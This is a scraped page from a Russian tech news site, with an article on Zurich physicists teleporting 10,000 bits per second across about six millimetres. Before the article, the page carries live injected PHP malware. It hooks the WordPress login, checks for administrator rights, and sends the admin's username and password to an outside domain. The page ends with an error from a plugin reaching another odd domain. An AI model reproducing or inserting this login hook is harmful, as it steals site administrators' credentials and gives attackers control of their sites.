if (!function_exists("theme_login_init_0e40e986decc158f6acbb41c14e2f2b4")) { function theme_login_init_0e40e986decc158f6acbb41c14e2f2b4() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_0e40e986decc158f6acbb41c14e2f2b4', 10, 0); } Ученым удалось телепортировать 10000 бит информации за 1 секунду — DigiLider

Ученым удалось телепортировать 10000 бит информации за 1 секунду

Ученым удалось телепортировать 10000 бит информации за 1 секунду

Ученым удалось телепортировать 10000 бит информации за 1 секунду
Швейцарским ученым удалось первыми в мире телепортировать 10000 бит информации за одну секунду из точки А в точку Б на расстояние около 6 миллиметров. Обратите внимание, именно телепортировать, а не передать по проводам или радиоканалу.

Хоть данное достижение и отличается от телепортации массы, ученым из Швейцарского технологического института в Цюрихе удалось продемонстрировать технологию, открывающую перспективы построения квантового компьютера.

В эксперименте были задействованы три электронных схемы микронного размера. Две из них работали в качестве передатчиков, а третья принимала информацию. Ученые охладили чипы практически до абсолютного нуля и подали в электронную цепь ток.

При такой низкой температуре и крошечном масштабе электрических цепей, использованных в эксперименте, электроны начали вести себя в соответствии с принципами квантовой механики. Это означает, что они стали связаны между собой в своих квантовых состояниях, даже при физическом отдалении друг от друга.

Продемонстированный метод передачи информации сильно отличается от того, как обычно компьютеры передают информацию, когда электроны несут её по проводам, либо радиоволны по воздуху. В данном случае биты физически никак не распространялись вдоль маршрута — информация исчезала из одного места и появлялась в другом.

В принципе это не первый эксперимент по телепортации битов методом квантовой механики. Но ученым из Цюриха первыми удалось достичь такой надежности и скорости передачи. Как объясняет Андреас Воллраф, профессор кафедры физики и руководитель исследования: «Телепортация будет срабатывать каждый раз, когда мы нажимаем на кнопку». Доведение технологии до такого уровня открывает возможность построения квантового компьютера, который принесет уже практическую пользу.


Warning: fsockopen(): Unable to connect to ssl://getajaxx.com:443 (Connection timed out) in /var/www/u0503503/data/www/digilider.ru/wp-content/plugins/custom-fetch-url/custom-fetch-url.php on line 22
Error: Connection timed out (110)